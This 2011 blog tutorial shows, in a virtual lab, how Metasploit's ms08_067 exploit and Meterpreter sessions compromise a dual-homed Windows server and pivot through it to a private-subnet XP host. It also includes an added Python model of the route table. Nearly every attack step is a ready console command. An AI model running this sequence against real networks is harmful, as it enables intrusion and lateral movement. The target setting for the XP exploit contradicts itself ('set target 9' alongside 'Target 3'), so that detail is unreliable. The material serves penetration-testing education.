Monday, October 10, 2011

Pivoting into Other Systems with Metasploit


Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to reach a private subnet inside a network. For example, an attacker compromises a host (e.g., a web server) that is reachable from outside (i.e., has a routable IP address) and uses that host as a staging point to pivot to and compromise other systems on subnets that would not have been reachable from outside the network. According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.

For this setup, I will use the following VirtualBox virtual machines:
  • BackTrack 5 R1
    • Attacker machine
    • 192.168.1.107
  • Windows Server 2003
    • Web server
    • Accessible (public IP) – 192.168.1.105
    • Non-accessible (private IP) – 192.168.56.102
  • Windows XP
    • Host machine
    • 192.168.56.103
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and set up a staging point on that server to pivot to the Windows XP host, which is only reachable from inside the network.
First, I map the network with Nmap to discover any reachable hosts:
  • nmap -sS 192.168.1.1/24
Once I have discovered 192.168.1.105, I scan it for open ports and running services:
  • nmap -sV -O 192.168.1.105
The scan shows that port 80 (the public web server port) is running an Apache web server, and that ports 135 and 139 are open as well. I use the Windows netapi exploit, known as the "Server Service Vulnerability":
  • use windows/smb/ms08_067_netapi
  • show payloads
  • set PAYLOAD windows/meterpreter/bind_tcp
    • A bind shell is a payload that "binds" a command prompt to a listening port on the target machine, to which the attacker then connects to maintain access to the machine.
  • show options
    • View which settings are required.
  • set RHOST 192.168.1.105
  • show targets
    • To specify our target.
  • set target 9
    • Target 9 is Windows Server 2003 SP1.
  • exploit
Once the host is exploited, a Meterpreter session is created and our machine has direct access to and control over the server. We confirm this by entering the ipconfig command to view its IP addresses. The command returns:
  • 192.168.1.105 / 255.255.255.0
  • 192.168.56.102 / 255.255.255.0
Since we do not have direct access to the 192.168.56.0 network, we run an ARP scan through the session to discover hosts that are up on that network:
  • run arp_scanner -r 192.168.56.1/24
With the network and its hosts discovered, we set up a route so that traffic for the private subnet is sent through our Meterpreter session. First, we have to background the Meterpreter session.
  • background
  • route add 192.168.56.1 255.255.255.0 1
    • The command routes traffic for that subnet through our Meterpreter session, id 1.
    • You can view the session id by entering the command sessions -l
  • route print
    • To view the routing table and confirm that the route was added.
We need to port scan the host discovered by arp_scanner to find a port over which we can set up communication. First, we go back and load the auxiliary module for TCP port scanning. The required setting is the remote host (RHOSTS).
  • back
  • use scanner/portscan/tcp
  • show options
  • set RHOSTS 192.168.56.103
  • run
Ports 25, 80, 135, and 139 are open. We will use the RPC exploit against port 135 and then have direct access to and control over the machine through a Meterpreter session.
  • back
  • use windows/smb/ms08_067_netapi
  • show options
  • set RHOST 192.168.56.103
  • set PAYLOAD windows/meterpreter/bind_tcp
  • show options
  • show targets
    • To specify our target.
  • set target 9
    • Target 3 is Windows XP SP2.
  • exploit
A Meterpreter session should be created, and the attacker machine now has full control of the compromised host in the private subnet. Type ipconfig to view the compromised host's IP configuration.
Background the Meterpreter session by entering the command background.
View your sessions by typing sessions.
The output displays the path you have taken from your machine to the host in the private subnet under the "Connection" column:
  • 192.168.1.107:59377 -> 192.168.1.105:4444
    • From the attacker machine to the web server
  • 192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444
    • From the web server to the XP host
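To make the route step and the "Connection" column concrete, here is an added Python model (not the tutorial's commands or Metasploit's own code) of the pivot route table as it is used above: `route add <subnet> <netmask> <session>` records a subnet-to-session mapping, a destination matching a route is relayed through that session, and anything else goes out directly. The longest-prefix matching and the normalisation of "192.168.56.1 255.255.255.0" to the network 192.168.56.0/24 are assumptions of this model, not a description of Metasploit internals; the sample routes and connection strings are constructed from the addresses in this post.

```python
import ipaddress
from typing import Optional


class PivotRoutes:
    """Minimal model of a Metasploit-style pivot route table (added example).
    Each route maps a subnet to the session id whose host relays the traffic."""

    def __init__(self) -> None:
        self.routes: list[tuple[ipaddress.IPv4Network, int]] = []

    def add(self, subnet: str, netmask: str, session_id: int) -> ipaddress.IPv4Network:
        # Assumption: a host address given as the subnet is normalised to its
        # network, so '192.168.56.1 255.255.255.0' covers all of 192.168.56.0/24.
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        self.routes.append((net, session_id))
        return net

    def lookup(self, dest: str) -> Optional[int]:
        # Longest-prefix match (assumed): most specific route wins; None = direct.
        addr = ipaddress.ip_address(dest)
        best = None
        for net, sid in self.routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return best[1] if best else None

    def print_table(self) -> list[str]:
        # Rough equivalent of 'route print': one line per route.
        return [f"{net.network_address}  {net.netmask}  Session {sid}"
                for net, sid in self.routes]


def hops_from_connection(connection: str) -> list[str]:
    """Parse a 'sessions -l' Connection string into the chain of hosts.
    '192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444' lists the attacker,
    the pivot host (port 0 marks a relayed hop) and the final target."""
    left, right = (part.strip() for part in connection.split("->"))
    hosts = [hop.rsplit(":", 1)[0] for hop in left.split("-")]
    hosts.append(right.rsplit(":", 1)[0])
    return hosts


if __name__ == "__main__":
    table = PivotRoutes()
    table.add("192.168.56.1", "255.255.255.0", 1)  # the route from the post
    print("\n".join(table.print_table()))
    for dest in ("192.168.56.103", "192.168.1.105"):
        sid = table.lookup(dest)
        print(dest, "-> session", sid if sid is not None else "direct")
    print(hops_from_connection("192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444"))
```

From a defender's side, the same view is why a dual-homed host with a public address deserves extra scrutiny: once it is compromised, every route added through it turns it into a relay into the private subnet.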
